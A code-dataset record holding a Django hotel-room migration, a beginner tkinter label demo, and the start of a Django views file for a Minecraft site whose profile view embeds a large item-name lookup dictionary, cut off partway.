d630e5ba33092c584e73ad080308fae594141f6f | a0050717ec4c859f6591db7754f8738c39c4f835 | /hotel/migrations/0001_initial.py | 4ef8d84594f420380cc5b09dcc2525b15d0b124e | [] | no_license | mailysvl/loc | c208f344202280d5447f9129ef3c8ee31137ecc1 | ce3c4be036e849454d86a0b1091a3cf608f81e0c | refs/heads/master | 2020-03-24T20:36:52.757412 | 2018-07-31T08:50:33 | 2018-07-31T08:50:33 | 142,987,639 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | # Generated by Django 2.0.1 on 2018-06-12 01:32
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Room',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('room_type', models.CharField(max_length=100)),
('description', models.TextField(blank=True, null=True)),
('room_size', models.IntegerField()),
('nightly_price', models.DecimalField(decimal_places=2, max_digits=10)),
('monthly_price', models.DecimalField(decimal_places=2, max_digits=10)),
('guests', models.IntegerField()),
('breakfast_included', models.BooleanField()),
('view', models.CharField(max_length=50)),
],
),
]
| [
"ksivilay28@gmail.com"
] | ksivilay28@gmail.com |
d341f0362017e5500d7df28450208436149a1e49 | a7d906ccb28a14c39eb986a991362930d4903661 | /Basics/basic1.py | 20e484aaab7773a5c329167cabbd509aa1db9c78 | [] | no_license | falaqm/ArtOfDoingTkinter | fe7944b2d002c39dd6d711554ec673e5a85affb6 | 7226825ecdc0e71fd507df57ffea14ca7fb57fba | refs/heads/master | 2023-03-28T01:19:48.905505 | 2021-04-01T13:14:17 | 2021-04-01T13:14:17 | 352,979,232 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 891 | py | # Labels and Pack
import tkinter as tk
# Define Window
root = tk.Tk()
root.title("Window Basics")
root.iconbitmap("hot_air_balloon.ico")
root.geometry("400x400")
root.resizable(0, 0)
root.config(bg='blue')
# Create Widgets
lbl_name_1 = tk.Label(root,text='Hello my name is Maria')
lbl_name_1.pack()
lbl_name_2 = tk.Label(root,text='Hello my name is Maria',font=('Arial',18,'bold'))
lbl_name_2.pack()
lbl_name_3 = tk.Label(root)
lbl_name_3.config(text="Hello my name is Maria")
lbl_name_3.config(font=('Cambria',10))
lbl_name_3.config(bg='#ff0077')
lbl_name_3.pack(padx=10,pady=50)
lbl_name_4 = tk.Label(root,text='Hello my name is Maria',bg="#000000",fg="green",)
lbl_name_4.pack(pady=(0,10),ipadx=50,ipady=10,anchor="w")
lbl_name_5 = tk.Label(root,text='Hello my name is Maria',bg="#ffffff",fg="#123456")
lbl_name_5.pack(fill=tk.BOTH,expand=True,padx=10,pady=10)
root.mainloop()
| [
"m2492141"
] | m2492141 |
9944b7a59ff1b20e079e84460f9acb8f095ddba7 | 68c51d14853d7a50fe28086904e89fdf6ceaeb2b | /user/views.py | a02d77889b62d4f905c4ccc18910588cdc7543c2 | [] | no_license | theballkyo/minecraft-web-py | bc52a5537b8d1bd3f782aa263a990a85a8b57837 | 9463b14218a774022f0e784249831ba7b3953ac2 | refs/heads/master | 2016-09-05T09:48:32.988994 | 2015-08-29T04:54:11 | 2015-08-29T04:54:11 | 40,349,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51,052 | py | from django.shortcuts import render
from django.http import HttpResponse
from .forms import CreateForm
from .models import Account, Inv
from hashlib import sha256
import random
import string
def index(request):
return render(request, 'index.html')
def profile(request, username):
user = Inv.objects.filter(inv_player__in=[username])[0]
item = {'record_wait': {'0': {'class': 'at5 at5_97', 'name': 'Music Disk (Wait)'}, 'ID': '2267'}, 'torch': {'0': {'class': 'at1 at_6', 'name': 'Torch'}, 'ID': '50'}, 'stained_hardened_clay': {'2': {'class': 'at2 at_36', 'name': 'Stained Clay (Magenta)'}, '0': {'class': 'at2 at_34', 'name': 'Stained Clay (White)'}, '14': {'class': 'at2 at_48', 'name': 'Stained Clay (Red)'}, '10': {'class': 'at2 at_44', 'name': 'Stained Clay (Purple)'}, 'ID': '159:15', '12': {'class': 'at2 at_46', 'name': 'Stained Clay (Brown)'}, '6': {'class': 'at2 at_40', 'name': 'Stained Clay (Pink)'}, '11': {'class': 'at2 at_45', 'name': 'Stained Clay (Blue)'}, '7': {'class': 'at2 at_41', 'name': 'Stained Clay (Gray)'}, '5': {'class': 'at2 at_39', 'name': 'Stained Clay (Lime)'}, '13': {'class': 'at2 at_47', 'name': 'Stained Clay (Green)'}, '3': {'class': 'at2 at_37', 'name': 'Stained Clay (Light Blue)'}, '8': {'class': 'at2 at_42', 'name': 'Stained Clay (Light Gray)'}, '4': {'class': 'at2 at_38', 'name': 'Stained Clay (Yellow)'}, '15': {'class': 'at2 at_49', 'name': 'Stained Clay (Black)'}, '1': {'class': 'at2 at_35', 'name': 'Stained Clay (Orange)'}, '9': {'class': 'at2 at_43', 'name': 'Stained Clay (Cyan)'}}, 'redstone': {'0': {'class': 'at3 at_96', 'name': 'Redstone Dust'}, 'ID': '331'}, 'book': {'0': {'class': 'at4 at_5', 'name': 'Book'}, 'ID': '340'}, 'golden_axe': {'0': {'class': 'at3 at_51', 'name': 'Gold Axe'}, 'ID': '286'}, 'detector_rail': {'0': {'class': 'at0 at_52', 'name': 'Rail (Detector)'}, 'ID': '28'}, 'dark_oak_fence_gate': {'0': {'class': 'at3 at_13', 'name': 'Fence Gate (Dark Oak)'}, 'ID': '186'}, 'cobblestone_wall': {'1': {'class': 'at2 at_15', 'name': 'Mossy Cobblestone Wall'}, '0': {'class': 'at2 at_14', 'name': 'Cobblestone Wall'}, 'ID': '139:1'}, 'coal_block': {'0': {'class': 'at2 at_97', 'name': 'Block of Coal'}, 'ID': '173'}, 'golden_sword': {'0': {'class': 'at3 at_48', 'name': 'Gold Sword'}, 'ID': '283'}, 'sandstone': {'1': {'class': 'at0 at_47', 'name': 'Sandstone 
(Chiseled)'}, '0': {'class': 'at0 at_46', 'name': 'Sandstone'}, 'ID': '24:2', '2': {'class': 'at0 at_48', 'name': 'Sandstone (Smooth)'}}, 'diamond_shovel': {'0': {'class': 'at3 at_42', 'name': 'Diamond Shovel'}, 'ID': '277'}, 'iron_sword': {'0': {'class': 'at3 at_32', 'name': 'Iron Sword'}, 'ID': '267'}, 'record_stal': {'0': {'class': 'at5 at5_93', 'name': 'Music Disk (Stal)'}, 'ID': '2263'}, 'stained_glass': {'2': {'class': 'at1 at_51', 'name': 'Stained Glass (Magenta)'}, '0': {'class': 'at1 at_49', 'name': 'Stained Glass (White)'}, '14': {'class': 'at1 at_63', 'name': 'Stained Glass (Red)'}, '10': {'class': 'at1 at_59', 'name': 'Stained Glass (Purple)'}, 'ID': '95:15', '12': {'class': 'at1 at_61', 'name': 'Stained Glass (Brown)'}, '6': {'class': 'at1 at_55', 'name': 'Stained Glass (Pink)'}, '11': {'class': 'at1 at_60', 'name': 'Stained Glass (Blue)'}, '7': {'class': 'at1 at_56', 'name': 'Stained Glass (Gray)'}, '5': {'class': 'at1 at_54', 'name': 'Stained Glass (Lime)'}, '13': {'class': 'at1 at_62', 'name': 'Stained Glass (Green)'}, '3': {'class': 'at1 at_52', 'name': 'Stained Glass (Light Blue)'}, '8': {'class': 'at1 at_57', 'name': 'Stained Glass (Light Grey)'}, '4': {'class': 'at1 at_53', 'name': 'Stained Glass (Yellow)'}, '15': {'class': 'at1 at_64', 'name': 'Stained Glass (Black)'}, '1': {'class': 'at1 at_50', 'name': 'Stained Glass (Orange)'}, '9': {'class': 'at1 at_58', 'name': 'Stained Glass (Cyan)'}}, 'beef': {'0': {'class': 'at4 at_47', 'name': 'Raw Beef'}, 'ID': '363'}, 'noteblock': {'0': {'class': 'at0 at_49', 'name': 'Note Block'}, 'ID': '25'}, 'rail': {'0': {'class': 'at1 at_21', 'name': 'Rail'}, 'ID': '66'}, 'fire_charge': {'0': {'class': 'at5 at5_21', 'name': 'Fire Charge'}, 'ID': '385'}, 'oak_stairs': {'0': {'class': 'at1 at_9', 'name': 'Wooden Stairs (Oak)'}, 'ID': '53'}, 'jukebox': {'0': {'class': 'at1 at_38', 'name': 'Jukebox'}, 'ID': '84'}, 'gravel': {'0': {'class': 'at0 at_26', 'name': 'Gravel'}, 'ID': '13'}, 'fish': {'1': {'class': 'at4 
at_15', 'name': 'Raw Salmon'}, '0': {'class': 'at4 at_14', 'name': 'Raw Fish'}, 'ID': '349:3', '3': {'class': 'at4 at_17', 'name': 'Pufferfish'}, '2': {'class': 'at4 at_16', 'name': 'Clownfish'}}, 'saddle': {'0': {'class': 'at3 at_94', 'name': 'Saddle'}, 'ID': '329'}, 'soul_sand': {'0': {'class': 'at1 at_42', 'name': 'Soul Sand'}, 'ID': '88'}, 'command_block': {'0': {'class': 'at2 at_12', 'name': 'Command Block'}, 'ID': '137'}, 'mycelium': {'0': {'class': 'at1 at_79', 'name': 'Mycelium'}, 'ID': '110'}, 'golden_horse_armor': {'0': {'class': 'at5 at5_58', 'name': 'Gold Horse Armor'}, 'ID': '418'}, 'double_plant': {'5': {'class': 'at3 at_4', 'name': 'Peony'}, '2': {'class': 'at3 at_1', 'name': 'Double Tallgrass'}, '0': {'class': 'at2 at_99', 'name': 'Sunflower'}, '3': {'class': 'at3 at_2', 'name': 'Large Fern'}, '4': {'class': 'at3 at_3', 'name': 'Rose Bush'}, '1': {'class': 'at3', 'name': 'Lilac'}, 'ID': '175:5'}, 'sign': {'0': {'class': 'at3 at_88', 'name': 'Sign'}, 'ID': '323'}, 'stone_pressure_plate': {'0': {'class': 'at1 at_24', 'name': 'Stone Pressure Plate'}, 'ID': '70'}, 'record_strad': {'0': {'class': 'at5 at5_94', 'name': 'Music Disk (Strad)'}, 'ID': '2264'}, 'cocoa': {'0': {'class': 'at2 at_2', 'name': 'Cocoa Plant'}, 'ID': '127'}, 'log2': {'1': {'class': 'at2 at_69', 'name': 'Wood (Dark Oak)'}, '0': {'class': 'at2 at_68', 'name': 'Wood (Acacia Oak)'}, 'ID': '162:1'}, 'nether_star': {'0': {'class': 'at5 at5_39', 'name': 'Nether Star'}, 'ID': '399'}, 'glowstone': {'0': {'class': 'at1 at_43', 'name': 'Glowstone'}, 'ID': '89'}, 'gunpowder': {'0': {'class': 'at3 at_54', 'name': 'Gunpowder'}, 'ID': '289'}, 'wooden_axe': {'0': {'class': 'at3 at_36', 'name': 'Wooden Axe'}, 'ID': '271'}, 'fence_gate': {'0': {'class': 'at1 at_76', 'name': 'Fence Gate (Oak)'}, 'ID': '107'}, 'tallgrass': {'1': {'class': 'at0 at_55', 'name': 'Tall Grass'}, '0': {'class': 'at0 at_57', 'name': 'Tall Grass (Dead Shrub)'}, 'ID': '31:2', '2': {'class': 'at0 at_56', 'name': 'Tall Grass 
(Fern)'}}, 'brick': {'0': {'class': 'at4 at_1', 'name': 'Clay Brick'}, 'ID': '336'}, 'slime': {'0': {'class': 'at2 at_72', 'name': 'Slime Block'}, 'ID': '165'}, 'clock': {'0': {'class': 'at4 at_12', 'name': 'Watch'}, 'ID': '347'}, 'bedrock': {'0': {'class': 'at0 at_20', 'name': 'Bedrock'}, 'ID': '7'}, 'poisonous_potato': {'0': {'class': 'at5 at5_30', 'name': 'Poisonous Potato'}, 'ID': '394'}, 'pumpkin': {'0': {'class': 'at1 at_40', 'name': 'Pumpkin'}, 'ID': '86'}, 'mossy_cobblestone': {'0': {'class': 'at1 at_4', 'name': 'Moss Stone'}, 'ID': '48'}, 'ender_chest': {'0': {'class': 'at2 at_5', 'name': 'Ender Chest'}, 'ID': '130'}, 'stone_shovel': {'0': {'class': 'at3 at_38', 'name': 'Stone Shovel'}, 'ID': '273'}, 'sticky_piston': {'0': {'class': 'at0 at_53', 'name': 'Sticky Piston'}, 'ID': '29'}, 'farmland': {'0': {'class': 'at1 at_16', 'name': 'Farmland'}, 'ID': '60'}, 'mutton': {'0': {'class': 'at5 at5_63', 'name': 'Raw Mutton'}, 'ID': '423'}, 'golden_rail': {'0': {'class': 'at0 at_51', 'name': 'Rail (Powered)'}, 'ID': '27'}, 'furnace_minecart': {'0': {'class': 'at4 at_8', 'name': 'Minecart (Powered)'}, 'ID': '343'}, 'snow': {'0': {'class': 'at1 at_34', 'name': 'Snow Block'}, 'ID': '80'}, 'acacia_fence_gate': {'0': {'class': 'at3 at_14', 'name': 'Fence Gate (Acacia)'}, 'ID': '187'}, 'spruce_fence_gate': {'0': {'class': 'at3 at_10', 'name': 'Fence Gate (Spruce)'}, 'ID': '183'}, 'powered_repeater': {'0': {'class': 'at1 at_48', 'name': 'Redstone Repeater (Block On)'}, 'ID': '94'}, 'fire': {'0': {'class': 'at1 at_7', 'name': 'Fire'}, 'ID': '51'}, 'chainmail_boots': {'0': {'class': 'at3 at_70', 'name': 'Chainmail Boots'}, 'ID': '305'}, 'rotten_flesh': {'0': {'class': 'at4 at_51', 'name': 'Rotten Flesh'}, 'ID': '367'}, 'redstone_wire': {'0': {'class': 'at1 at_11', 'name': 'Redstone Wire'}, 'ID': '55'}, 'lever': {'0': {'class': 'at1 at_23', 'name': 'Lever'}, 'ID': '69'}, 'hopper': {'0': {'class': 'at2 at_27', 'name': 'Hopper'}, 'ID': '154'}, 'milk_bucket': {'0': {'class': 
'at4', 'name': 'Bucket (Milk)'}, 'ID': '335'}, 'standing_sign': {'0': {'class': 'at3 at_88', 'name': 'Sign (Block)'}, 'ID': '63'}, 'prismarine': {'1': {'class': 'at2 at_76', 'name': 'Prismarine Bricks'}, '0': {'class': 'at2 at_75', 'name': 'Prismarine'}, 'ID': '168:2', '2': {'class': 'at2 at_77', 'name': 'Dark Prismarine'}}, 'nether_brick': {'0': {'class': 'at1 at_81', 'name': 'Nether Brick'}, 'ID': '112'}, 'rabbit_stew': {'0': {'class': 'at5 at5_53', 'name': 'Rabbit Stew'}, 'ID': '413'}, 'diamond': {'0': {'class': 'at3 at_29', 'name': 'Diamond Gem'}, 'ID': '264'}, 'stone_slab2': {'0': {'class': 'at3 at_9', 'name': 'Red Sandstone Slab'}, 'ID': '182'}, 'stone': {'5': {'class': 'at0 at_5', 'name': 'Andesite'}, '2': {'class': 'at0 at_2', 'name': 'Polished Granite'}, '0': {'class': 'at0', 'name': 'Stone'}, '3': {'class': 'at0 at_3', 'name': 'Diorite'}, '4': {'class': 'at0 at_4', 'name': 'Polished Diorite'}, '1': {'class': 'at0 at_1', 'name': 'Granite'}, 'ID': '1:6', '6': {'class': 'at0 at_6', 'name': 'Polished Andesite'}}, 'sugar': {'0': {'class': 'at4 at_37', 'name': 'Sugar'}, 'ID': '353'}, 'cooked_beef': {'0': {'class': 'at4 at_48', 'name': 'Steak'}, 'ID': '364'}, 'egg': {'0': {'class': 'at4 at_9', 'name': 'Egg'}, 'ID': '344'}, 'acacia_fence': {'0': {'class': 'at3 at_19', 'name': 'Fence (Acacia)'}, 'ID': '192'}, 'potato': {'0': {'class': 'at5 at5_28', 'name': 'Potato'}, 'ID': '392'}, 'record_13': {'0': {'class': 'at5 at5_86', 'name': 'Music Disk (13)'}, 'ID': '2256'}, 'dye': {'2': {'class': 'at4 at_22', 'name': 'Cactus Green Dye'}, '0': {'class': 'at4 at_20', 'name': 'Ink Sack'}, '14': {'class': 'at4 at_34', 'name': 'Orange Dye'}, '10': {'class': 'at4 at_30', 'name': 'Lime Dye'}, 'ID': '351:15', '12': {'class': 'at4 at_32', 'name': 'Light Blue Dye'}, '6': {'class': 'at4 at_26', 'name': 'Cyan Dye'}, '11': {'class': 'at4 at_31', 'name': 'Dandelion Yellow Dye'}, '7': {'class': 'at4 at_27', 'name': 'Light Gray Dye'}, '5': {'class': 'at4 at_25', 'name': 'Purple Dye'}, 
'13': {'class': 'at4 at_33', 'name': 'Magenta Dye'}, '3': {'class': 'at4 at_23', 'name': 'Cocoa Bean'}, '8': {'class': 'at4 at_28', 'name': 'Gray Dye'}, '4': {'class': 'at4 at_24', 'name': 'Lapis Lazuli'}, '15': {'class': 'at4 at_35', 'name': 'Bone Meal'}, '1': {'class': 'at4 at_21', 'name': 'Rose Red Dye'}, '9': {'class': 'at4 at_29', 'name': 'Pink Dye'}}, 'birch_door': {'0': {'class': 'at5 at5_82', 'name': 'Wooden Door (Birch)'}, 'ID': '428'}, 'iron_trapdoor': {'0': {'class': 'at2 at_74', 'name': 'Iron Trapdoor'}, 'ID': '167'}, 'blaze_rod': {'0': {'class': 'at4 at_53', 'name': 'Blaze Rod'}, 'ID': '369'}, 'skull': {'2': {'class': 'at5 at5_35', 'name': 'Head (Zombie)'}, '0': {'class': 'at5 at5_33', 'name': 'Head (Skeleton)'}, '3': {'class': 'at5 at5_36', 'name': 'Head (Steve)'}, '4': {'class': 'at5 at5_37', 'name': 'Head (Creeper)'}, '1': {'class': 'at5 at5_34', 'name': 'Head (Wither)'}, 'ID': '397:4'}, 'cooked_mutton': {'0': {'class': 'at5 at5_64', 'name': 'Cooked Mutton'}, 'ID': '424'}, 'chainmail_chestplate': {'0': {'class': 'at3 at_68', 'name': 'Chainmail Chestplate'}, 'ID': '303'}, 'sand': {'1': {'class': 'at0 at_25', 'name': 'Red Sand'}, '0': {'class': 'at0 at_24', 'name': 'Sand'}, 'ID': '12:1'}, 'fence': {'0': {'class': 'at1 at_39', 'name': 'Fence (Oak)'}, 'ID': '85'}, 'wooden_hoe': {'0': {'class': 'at3 at_55', 'name': 'Wooden Hoe'}, 'ID': '290'}, 'golden_chestplate': {'0': {'class': 'at3 at_80', 'name': 'Gold Chestplate'}, 'ID': '315'}, 'daylight_detector_inverted': {'0': {'class': '', 'name': 'Inverted Daylight Sensor'}, 'ID': '178'}, 'cooked_rabbit': {'0': {'class': 'at5 at5_52', 'name': 'Cooked Rabbit'}, 'ID': '412'}, 'leather_leggings': {'0': {'class': 'at3 at_65', 'name': 'Leather Leggings'}, 'ID': '300'}, 'rabbit_hide': {'0': {'class': 'at5 at5_55', 'name': 'Rabbit Hide'}, 'ID': '415'}, 'double_wooden_slab': {'5': {'class': 'at1 at_95', 'name': 'Dark Oak Wood Slab (Double)'}, '2': {'class': 'at0 at_12', 'name': 'Birch-Wood Slab (Double)'}, '0': 
{'class': 'at0 at_11', 'name': 'Oak-Wood Slab (Double)'}, '3': {'class': 'at0 at_13', 'name': 'Jungle-Wood Slab (Double)'}, '4': {'class': 'at1 at_94', 'name': 'Acacia Wood Slab (Double)'}, '1': {'class': 'at0 at_22', 'name': 'Spruce-Wood Slab (Double)'}, 'ID': '125:5'}, 'stone_brick_stairs': {'0': {'class': 'at1 at_78', 'name': 'Stone Brick Stairs'}, 'ID': '109'}, 'dark_oak_fence': {'0': {'class': 'at3 at_18', 'name': 'Fence (Dark Oak)'}, 'ID': '191'}, 'jungle_fence_gate': {'0': {'class': 'at3 at_12', 'name': 'Fence Gate (Jungle)'}, 'ID': '185'}, 'gold_ingot': {'0': {'class': 'at3 at_31', 'name': 'Gold Ingot'}, 'ID': '266'}, 'fireworks': {'0': {'class': 'at5 at5_41', 'name': 'Firework Rocket'}, 'ID': '401'}, 'bucket': {'0': {'class': 'at3 at_90', 'name': 'Bucket'}, 'ID': '325'}, 'wheat_seeds': {'0': {'class': 'at3 at_60', 'name': 'Wheat Seeds'}, 'ID': '295'}, 'iron_door': {'0': {'class': 'at3 at_95', 'name': 'Iron Door'}, 'ID': '330'}, 'deadbush': {'0': {'class': 'at0 at_57', 'name': 'Dead Shrub'}, 'ID': '32'}, 'pumpkin_pie': {'0': {'class': 'at5 at5_40', 'name': 'Pumpkin Pie'}, 'ID': '400'}, 'record_mellohi': {'0': {'class': 'at5 at5_92', 'name': 'Music Disk (Mellohi)'}, 'ID': '2262'}, 'wooden_pressure_plate': {'0': {'class': 'at1 at_26', 'name': 'Wooden Pressure Plate'}, 'ID': '72'}, 'emerald_ore': {'0': {'class': 'at2 at_4', 'name': 'Emerald Ore'}, 'ID': '129'}, 'stone_button': {'0': {'class': 'at1 at_31', 'name': 'Button (Stone)'}, 'ID': '77'}, 'quartz_ore': {'0': {'class': 'at2 at_26', 'name': 'Nether Quartz Ore'}, 'ID': '153'}, 'emerald': {'0': {'class': 'at5 at5_24', 'name': 'Emerald'}, 'ID': '388'}, 'golden_leggings': {'0': {'class': 'at3 at_81', 'name': 'Gold Leggings'}, 'ID': '316'}, 'written_book': {'0': {'class': 'at5 at5_23', 'name': 'Written Book'}, 'ID': '387'}, 'gold_nugget': {'0': {'class': 'at4 at_55', 'name': 'Gold Nugget'}, 'ID': '371'}, 'anvil': {'1': {'class': 'at2 at_20', 'name': 'Anvil (Slightly Damaged)'}, '0': {'class': 'at2 at_20', 
'name': 'Anvil'}, 'ID': '145:2', '2': {'class': 'at2 at_20', 'name': 'Anvil (Very Damaged)'}}, 'trapdoor': {'0': {'class': 'at1 at_65', 'name': 'Trapdoor'}, 'ID': '96'}, 'iron_leggings': {'0': {'class': 'at3 at_73', 'name': 'Iron Leggings'}, 'ID': '308'}, 'diamond_pickaxe': {'0': {'class': 'at3 at_43', 'name': 'Diamond Pickaxe'}, 'ID': '278'}, 'fishing_rod': {'0': {'class': 'at4 at_11', 'name': 'Fishing Rod'}, 'ID': '346'}, 'diamond_hoe': {'0': {'class': 'at3 at_58', 'name': 'Diamond Hoe'}, 'ID': '293'}, 'hopper_minecart': {'0': {'class': 'at5 at5_48', 'name': 'Minecart (Hopper)'}, 'ID': '408'}, 'diamond_horse_armor': {'0': {'class': 'at5 at5_59', 'name': 'Diamond Horse Armor'}, 'ID': '419'}, 'carrots': {'0': {'class': 'at2 at_17', 'name': 'Carrot (Crop)'}, 'ID': '141'}, 'cooked_fished': {'1': {'class': 'at4 at_19', 'name': 'Cooked Salmon'}, '0': {'class': 'at4 at_18', 'name': 'Cooked Fish'}, 'ID': '350:3', '3': {'class': 'at4 at_17', 'name': 'Pufferfish'}, '2': {'class': 'at4 at_16', 'name': 'Clownfish'}}, 'carrot_on_a_stick': {'0': {'class': 'at5 at5_38', 'name': 'Carrot on a Stick'}, 'ID': '398'}, 'red_sandstone_stairs': {'0': {'class': 'at3 at_8', 'name': 'Red Sandstone Stairs'}, 'ID': '180'}, 'name_tag': {'0': {'class': 'at5 at5_61', 'name': 'Name Tag'}, 'ID': '421'}, 'spawn_egg': {'50': {'class': 'at4 at_93', 'name': 'Spawn Egg (Creeper)'}, '68': {'class': 'at5 at5_8', 'name': 'Spawn Egg (Guardian)'}, '101': {'class': 'at5 at5_18', 'name': 'Spawn Egg (Rabbit)'}, '55': {'class': 'at4 at_97', 'name': 'Spawn Egg (Slime)'}, '100': {'class': 'at5 at5_17', 'name': 'Spawn Egg (Horse)'}, '51': {'class': 'at4 at_94', 'name': 'Spawn Egg (Skeleton)'}, '54': {'class': 'at4 at_96', 'name': 'Spawn Egg (Zombie)'}, '96': {'class': 'at5 at5_15', 'name': 'Spawn Egg (Mooshroom)'}, '62': {'class': 'at5 at5_4', 'name': 'Spawn Egg (Magma Cube)'}, '65': {'class': 'at5 at5_5', 'name': 'Spawn Egg (Bat)'}, '57': {'class': 'at4 at_99', 'name': 'Spawn Egg (Zombie Pigmen)'}, '61': 
{'class': 'at5 at5_3', 'name': 'Spawn Egg (Blaze)'}, '94': {'class': 'at5 at5_13', 'name': 'Spawn Egg (Squid)'}, '93': {'class': 'at5 at5_12', 'name': 'Spawn Egg (Chicken)'}, '92': {'class': 'at5 at5_11', 'name': 'Spawn Egg (Cow)'}, '90': {'class': 'at5 at5_9', 'name': 'Spawn Egg (Pig)'}, '52': {'class': 'at4 at_95', 'name': 'Spawn Egg (Spider)'}, 'ID': '383:120', '120': {'class': 'at5 at5_19', 'name': 'Spawn Egg (Villager)'}, '60': {'class': 'at5 at5_2', 'name': 'Spawn Egg (Silverfish)'}, '59': {'class': 'at5 at5_1', 'name': 'Spawn Egg (Cave Spider)'}, '95': {'class': 'at5 at5_14', 'name': 'Spawn Egg (Wolf)'}, '66': {'class': 'at5 at5_6', 'name': 'Spawn Egg (Witch)'}, '67': {'class': 'at5 at5_7', 'name': 'Spawn Egg (Endermite)'}, '58': {'class': 'at5', 'name': 'Spawn Egg (Endermen)'}, '56': {'class': 'at4 at_98', 'name': 'Spawn Egg (Ghast)'}, '98': {'class': 'at5 at5_16', 'name': 'Spawn Egg (Ocelot)'}, '91': {'class': 'at5 at5_10', 'name': 'Spawn Egg (Sheep)'}}, 'iron_block': {'0': {'class': 'at0 at_89', 'name': 'Block of Iron'}, 'ID': '42'}, 'lava_bucket': {'0': {'class': 'at3 at_92', 'name': 'Bucket (Lava)'}, 'ID': '327'}, 'unlit_redstone_torch': {'0': {'class': 'at1 at_29', 'name': 'Redstone Torch (Off)'}, 'ID': '75'}, 'unpowered_comparator': {'0': {'class': 'at5 at5_44', 'name': 'Redstone Comparator (Off)'}, 'ID': '149'}, 'leather': {'0': {'class': 'at3 at_99', 'name': 'Leather'}, 'ID': '334'}, 'glass_pane': {'0': {'class': 'at1 at_72', 'name': 'Glass Pane'}, 'ID': '102'}, 'water': {'0': {'class': 'at0 at_21', 'name': 'Water (No Spread)'}, 'ID': '9'}, 'iron_horse_armor': {'0': {'class': 'at5 at5_57', 'name': 'Iron Horse Armor'}, 'ID': '417'}, 'golden_apple': {'1': {'class': 'at3 at_87', 'name': 'Enchanted Golden Apple'}, '0': {'class': 'at3 at_87', 'name': 'Golden Apple'}, 'ID': '322:1'}, 'stick': {'0': {'class': 'at3 at_45', 'name': 'Stick'}, 'ID': '280'}, 'iron_boots': {'0': {'class': 'at3 at_74', 'name': 'Iron Boots'}, 'ID': '309'}, 'leaves2': {'1': 
{'class': 'at2 at_67', 'name': 'Leaves (Dark Oak)'}, '0': {'class': 'at2 at_66', 'name': 'Leaves (Acacia)'}, 'ID': '161:1'}, 'sea_lantern': {'0': {'class': 'at2 at_78', 'name': 'Sea Lantern'}, 'ID': '169'}, 'prismarine_shard': {'0': {'class': 'at5 at5_49', 'name': 'Prismarine Shard'}, 'ID': '409'}, 'wall_sign': {'0': {'class': 'at3 at_88', 'name': 'Sign (Wall Block)'}, 'ID': '68'}, 'tnt': {'0': {'class': 'at1 at_2', 'name': 'TNT'}, 'ID': '46'}, 'jungle_door': {'0': {'class': 'at5 at5_83', 'name': 'Wooden Door (Jungle)'}, 'ID': '429'}, 'paper': {'0': {'class': 'at4 at_4', 'name': 'Paper'}, 'ID': '339'}, 'vine': {'0': {'class': 'at1 at_75', 'name': 'Vines'}, 'ID': '106'}, 'daylight_detector': {'0': {'class': 'at2 at_24', 'name': 'Daylight Sensor'}, 'ID': '151'}, 'lava': {'0': {'class': 'at0 at_23', 'name': 'Lava (No Spread)'}, 'ID': '11'}, 'experience_bottle': {'0': {'class': 'at5 at5_20', 'name': 'Bottle of Enchanting'}, 'ID': '384'}, 'iron_ingot': {'0': {'class': 'at3 at_30', 'name': 'Iron Ingot'}, 'ID': '265'}, 'enchanted_book': {'0': {'class': 'at5 at5_43', 'name': 'Enchanted Book'}, 'ID': '403'}, 'stone_sword': {'0': {'class': 'at3 at_37', 'name': 'Stone Sword'}, 'ID': '272'}, 'flowing_lava': {'0': {'class': 'at0 at_23', 'name': 'Lava'}, 'ID': '10'}, 'red_flower': {'7': {'class': 'at0 at_84', 'name': 'Pink Tulip'}, '5': {'class': 'at0 at_82', 'name': 'Orange Tulip'}, '2': {'class': 'at0 at_79', 'name': 'Allium'}, '0': {'class': 'at0 at_77', 'name': 'Poppy'}, '3': {'class': 'at0 at_80', 'name': 'Azure Bluet'}, '8': {'class': 'at0 at_85', 'name': 'Oxeye Daisy'}, '4': {'class': 'at0 at_81', 'name': 'Red Tulip'}, '1': {'class': 'at0 at_78', 'name': 'Blue Orchid'}, 'ID': '38:8', '6': {'class': 'at0 at_83', 'name': 'White Tulip'}}, 'pumpkin_stem': {'0': {'class': 'at1 at_74', 'name': 'Pumpkin Vine'}, 'ID': '104'}, 'crafting_table': {'0': {'class': 'at1 at_14', 'name': 'Workbench'}, 'ID': '58'}, 'coal_ore': {'0': {'class': 'at0 at_29', 'name': 'Coal Ore'}, 'ID': '16'}, 
'iron_pickaxe': {'0': {'class': 'at3 at_21', 'name': 'Iron Pickaxe'}, 'ID': '257'}, 'bowl': {'0': {'class': 'at3 at_46', 'name': 'Bowl'}, 'ID': '281'}, 'record_far': {'0': {'class': 'at5 at5_90', 'name': 'Music Disk (Far)'}, 'ID': '2260'}, 'brick_stairs': {'0': {'class': 'at1 at_77', 'name': 'Brick Stairs'}, 'ID': '108'}, 'iron_bars': {'0': {'class': 'at1 at_71', 'name': 'Iron Bars'}, 'ID': '101'}, 'clay_ball': {'0': {'class': 'at4 at_2', 'name': 'Clay'}, 'ID': '337'}, 'bow': {'0': {'class': 'at3 at_25', 'name': 'Bow'}, 'ID': '261'}, 'chest': {'0': {'class': 'at1 at_10', 'name': 'Chest'}, 'ID': '54'}, 'melon': {'0': {'class': 'at4 at_44', 'name': 'Melon (Slice)'}, 'ID': '360'}, 'acacia_door': {'0': {'class': 'at5 at5_84', 'name': 'Wooden Door (Acacia)'}, 'ID': '430'}, 'wooden_door': {'0': {'class': 'at3 at_89', 'name': 'Wooden Door'}, 'ID': '324'}, 'dark_oak_stairs': {'0': {'class': 'at2 at_71', 'name': 'Wooden Stairs (Dark Oak)'}, 'ID': '164'}, 'flint_and_steel': {'0': {'class': 'at3 at_23', 'name': 'Flint and Steel'}, 'ID': '259'}, 'dark_oak_door': {'0': {'class': 'at5 at5_85', 'name': 'Wooden Door (Dark Oak)'}, 'ID': '431'}, 'map': {'0': {'class': 'at5 at5_31', 'name': 'Empty Map'}, 'ID': '395'}, 'glass': {'0': {'class': 'at0 at_42', 'name': 'Glass'}, 'ID': '20'}, 'bread': {'0': {'class': 'at3 at_62', 'name': 'Bread'}, 'ID': '297'}, 'compass': {'0': {'class': 'at4 at_10', 'name': 'Compass'}, 'ID': 